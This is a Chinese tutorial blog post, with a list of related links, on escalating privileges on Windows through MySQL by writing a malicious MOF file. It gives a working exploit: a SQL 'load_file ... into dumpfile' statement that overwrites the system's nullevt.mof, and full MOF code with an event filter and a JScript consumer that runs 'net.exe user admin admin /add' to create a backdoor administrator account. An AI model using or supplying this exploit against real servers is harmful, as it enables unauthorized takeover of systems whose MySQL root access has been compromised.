mysql mof提权原理_mof提权原理及其过程
mof提权的原理:
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。
以下是mof提权的过程:
将mof上传至任意可读可写目录下,这里我传到D:\wamp\下命名为:xishaonian.mof。也就是:D:\wamp\xishaonian.mof
然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。
替换的sql语句:select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
mof文件代码如下所示:
#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilteras$EventFilter
{
EventNamespace= "Root\\Cimv2";
Name= "filtP2";
Query= "Select * From __InstanceModificationEvent"
"Where TargetInstance Isa \"Win32_LocalTime\""
"And TargetInstance.Second = 5";
QueryLanguage= "WQL";
};
instance of ActiveScriptEventConsumeras$Consumer
{
Name= "consPCSV2";
ScriptingEngine= "JScript";
ScriptText=
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer=$Consumer;
Filter=$EventFilter;
};
可见其中是有一段添加用户的脚本。账号为admin 密码为admin
THE END
mysql mof提权原理_mof提权原理及其过程相关推荐
- mysql mof提权原理_mof提权原理及实现
关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的c ...
- mysql mof提权原理_Mof提权科普
首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -. 不多说了~.~像名称一样哈~ 首先呢是朋友扔我一shell 他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql. ...
- mysql udf提权原理_udf提权原理详解
0x00-前言 这个udf提权复现搞了三天,终于搞出来了.网上的教程对于初学者不太友好,以至于我一直迷迷糊糊的,走了不少弯路.下面就来总结一下我的理解. 想要知道udf提权是怎么回事,首先要先知道ud ...
- 一文了解提权:溢出提权和第三方组件提权
前言 对提权做个归纳 提权一般分为两种: 溢出提权 第三方组件提权 一.溢出提权 溢出提权就是利用系统漏洞进行提权 远程溢出:攻击者只要与服务器连接,然后根据漏洞使用响应的exp即可,如著名的MS-0 ...
- 提权学习:第三方软件提权(巴西烤肉提权和启动项提权)
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 巴西烤肉提权 启动项提权 0x01 启动项提权 0x02 启动项提权,拓展知识 [写入启动项提权/启动项里提权] 巴西烤肉提权 首先,基本 ...
- Day1——提权学习之提权基础
0x00 提权技术分类 大概分为三种: 1.系统溢出漏洞提权 2.数据库提权 3.第三方软件提权 0x01 通常脚本所处的权限 1.asp / php 匿名权限(网络服务权限) 2.aspx user ...
- oracle用户获取datameta权限,Oracle数据库提权(低权限提升至dba)
0x01 Oracle存储过程"缺陷" 在 Oracle 的存储过程中,有一个有趣的特点:运行权限.运行权限分为两种,definer 和 invoker. definer 为函数创 ...
- 第三方组件提权-SQL server提权
文章目录 基础 MSSQL权限级别 拿webshell xp_cmdshell执行系统命令 LOG备份getshell 提权 使用xp_cmdshell进行提权 以下内容为转载 使用sp_oacrea ...
- CobaltStrike使用-第五篇(Bypass UAC、CVE提权、Powerup提权)
前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录 权限提升 Bypass UAC CVE提权 PowerUp 凭证和哈希获取 Beacon 中的 ...
最新文章
- 写给那些在技术路上奔跑的人们!!!!!
- Py之torchvision:torchvision库的简介、安装、使用方法之详细攻略
- fragment+viewpager+tablayou实现滑动切换页面
- idea无法导入主题jar包_总结IDEA开发的26个常用设置
- nginx与IIS服务器搭建集群实现负载均衡(二)
- python字符串 切片_Python切片字符串
- EasyRecovery---U盘数据恢复技巧
- Windows系统性能分析
- 佳能g2810提示5b00_佳能G2810 3800系列出现5B00如何解决
- 家庭财务管理系统的设计与实现(Java毕业设计-Springboot)
- 中文期刊分类(blog版)
- 给儿子的一封信——大学才是人生真正的起点
- 如何使用真机测试运行HarmonyOS应用
- 【MySQL基础】MySQL介绍及安装
- 1873. 计算特殊奖金
- CMDN CLUB第14场:小米与友盟专家详解Android开发:
- 玩机搞机----mtk芯片机型 另类制作备份线刷包的方式 读写分区等等
- 《机器学习实战:基于Scikit-Learn、Keras和TensorFlow第2版》-学习笔记(8):降维
- @Inject和@Named
- ARM开发板如何安装Linux系统